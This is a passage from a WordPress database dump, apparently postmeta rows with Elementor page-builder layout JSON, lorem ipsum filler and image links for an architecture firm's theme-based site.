unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1076,684,'_elementor_page_assets','a:0:{}'),(1077,684,'_thumbnail_id','1167'),(1099,1349,'_thumbnail_id','2413'),(1100,1349,'ova_sev_met_icon','flaticon-furnitures'),(1101,1349,'ova_sev_met_order_sev','2000'),(1102,1349,'_elementor_edit_mode','builder'),(1103,1349,'_elementor_template_type','wp-post'),(1104,1349,'_elementor_version','3.6.6'),(1105,1349,'_wp_page_template','default'),(1106,1349,'_elementor_data','[{\"id\":\"659e9c4\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"ab07fd3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bddf16d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior work\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4619604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of lorem ipsum is simply free text available in the market, but the majority time you put aside to be in our office. Lorem ipsum dolor sit amet, consectetLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0c33bcc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>We stand for quality, safety &amp; credibility, so you could be trust us fully about architectural working process.<\\/p>\",\"text_color\":\"#242424\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"700\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"text_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"30\",\"bottom\":\"25\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"6\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"17eec8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34ad901\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"60\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"011b6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"e2540b5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-service-details.jpg\",\"id\":1244,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"042a846\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"033a856\",\"elType\":\"widget\",\"settings\":{\"title\":\"Our benefits\",\"header_size\":\"h3\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dbc8013\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25f096d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Praesent efficitur quam sit amet\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3e81ced\"},{\"text\":\"   Nunc cursus dolor id purus euismod\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"0534f6c\"},{\"text\":\"Quisque tincidunt eros ac place viverra\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7dea474\"}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"text_indent\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_weight\":\"600\",\"icon_typography_line_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"icon_typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6da6231\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"60\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e96b72a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"}},\"elements\":[{\"id\":\"c7de8ca\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Visualization to finished interior\",\"tab_content\":\"There are many variations of passages of simply free text available, but the majority have suffered alteration in some form.\",\"_id\":\"9046a13\"},{\"tab_title\":\"Architect draws sketches\",\"tab_content\":\"There are many variations of passages of simply free text available, but the majority have suffered alteration in some form.\",\"_id\":\"dc39351\"}],\"icon_align\":\"right\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":\"\",\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"selected_icon\":{\"value\":\"ovaicon ovaicon-plus\",\"library\":\"ovaicon\"},\"selected_active_icon\":{\"value\":\"ovaicon ovaicon-minus\",\"library\":\"ovaicon\"},\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"title_color\":\"#242424\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_typography_font_weight\":\"800\",\"title_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"icon_color\":\"#000000\",\"icon_active_color\":\"#E3B25A\",\"content_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"accordion_content_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"accordion_content_border_border\":\"solid\",\"accordion_content_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"accordion_content_border_color\":\"#E5E5E5\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(1107,1349,'_elementor_page_assets','a:0:{}'),(1109,1354,'_thumbnail_id','2415'),(1110,1354,'ova_sev_met_icon','flaticon-buildings'),(1111,1354,'ova_sev_met_order_sev','1000'),(1112,1354,'_elementor_edit_mode','builder'),(1113,1354,'_elementor_template_type','wp-post'),(1114,1354,'_elementor_version','3.6.6'),(1115,1354,'_wp_page_template','default'),(1116,1354,'_elementor_data','[{\"id\":\"659e9c4\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"ab07fd3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bddf16d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architecture\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4619604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of lorem ipsum is simply free text available in the market, but the majority time you put aside to be in our office. Lorem ipsum dolor sit amet, consectetLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0c33bcc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>We stand for quality, safety &amp; credibility, so you could be trust us fully about architectural working process.<\\/p>\",\"text_color\":\"#242424\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"700\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"text_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"30\",\"bottom\":\"25\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"6\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"17eec8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34ad901\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"60\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"011b6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"e2540b5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-service-details.jpg\",\"id\":1244,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"042a846\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"033a856\",\"elType\":\"widget\",\"settings\":{\"title\":\"Our benefits\",\"header_size\":\"h3\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dbc8013\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25f096d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Praesent efficitur quam sit amet\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3e81ced\"},{\"text\":\"   Nunc cursus dolor id purus euismod\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"0534f6c\"},{\"text\":\"Quisque tincidunt eros ac place viverra\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7dea474\"}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"text_indent\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_weight\":\"600\",\"icon_typography_line_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"icon_typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6da6231\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"60\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e96b72a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"}},\"elements\":[{\"id\":\"c7de8ca\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Visualization to finished interior\",\"tab_content\":\"There are many variations of passages of simply free text available, but the majority have suffered alteration in some form.\",\"_id\":\"9046a13\"},{\"tab_title\":\"Architect draws sketches\",\"tab_content\":\"There are many variations of passages of simply free text available, but the majority have suffered alteration in some form.\",\"_id\":\"dc39351\"}],\"icon_align\":\"right\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":\"\",\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"selected_icon\":{\"value\":\"ovaicon ovaicon-plus\",\"library\":\"ovaicon\"},\"selected_active_icon\":{\"value\":\"ovaicon ovaicon-minus\",\"library\":\"ovaicon\"},\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"title_color\":\"#242424\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_typography_font_weight\":\"800\",\"title_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"icon_color\":\"#000000\",\"icon_active_color\":\"#E3B25A\",\"content_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"accordion_content_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"accordion_content_border_border\":\"solid\",\"accordion_content_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"accordion_content_border_color\":\"#E5E5E5\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(1117,1354,'_elementor_page_assets','a:0:{}'),(1119,560,'_wp_page_template','elementor_header_footer'),(1120,560,'ova_met_header_version','ova,header-banner'),(1121,560,'ova_met_footer_version','ova,footer'),(1122,560,'ova_met_main_layout','global'),(1123,560,'ova_met_wide_site','global'),(1124,560,'_elementor_edit_mode','builder'),(1125,560,'_elementor_template_type','wp-page'),(1126,560,'_elementor_version','3.8.1'),(1127,560,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Bauhaus Residential Projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Kami memiliki keyakinan bahwa rumah adalah \\u201cLiving Space\\u201d atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1128,560,'_elementor_page_assets','a:0:{}'),(1129,560,'_wxr_import_has_attachment_refs','1'),(1130,775,'ova_met_header_version','global'),(1131,775,'ova_met_footer_version','global'),(1132,775,'ova_met_main_layout','global'),(1133,775,'ova_met_wide_site','global'),(1154,1090,'ova_met_header_version','global'),(1155,1090,'ova_met_footer_version','global'),(1156,1090,'ova_met_main_layout','global'),(1157,1090,'ova_met_wide_site','global'),(1158,1090,'ova_met_embed_media',''),(1159,1090,'_thumbnail_id','2436'),(1172,2430,'ova_met_header_version','global'),(1173,2430,'ova_met_footer_version','global'),(1174,2430,'ova_met_main_layout','global'),(1175,2430,'ova_met_wide_site','global'),(1176,2430,'ova_met_embed_media',''),(1177,2430,'_thumbnail_id','2435'),(1181,2432,'ova_met_header_version','global'),(1182,2432,'ova_met_footer_version','global'),(1183,2432,'ova_met_main_layout','global'),(1184,2432,'ova_met_wide_site','global'),(1185,2432,'ova_met_embed_media',''),(1186,2432,'_thumbnail_id','2849'),(1188,2628,'ova_met_header_version','global'),(1189,2628,'ova_met_footer_version','global'),(1190,2628,'ova_met_main_layout','global'),(1191,2628,'ova_met_wide_site','global'),(1192,2628,'_wp_page_template','elementor_header_footer'),(1193,2628,'_elementor_edit_mode','builder'),(1194,2628,'_elementor_template_type','wp-page'),(1195,2628,'_elementor_version','3.6.6'),(1196,2628,'_elementor_data','[{\"id\":\"7ed0ccc\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\"},\"elements\":[{\"id\":\"5b8c4e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"75fe659\",\"elType\":\"widget\",\"settings\":{\"text_next_control\":\"Next\",\"text_previos_control\":\"Previos\"},\"elements\":[]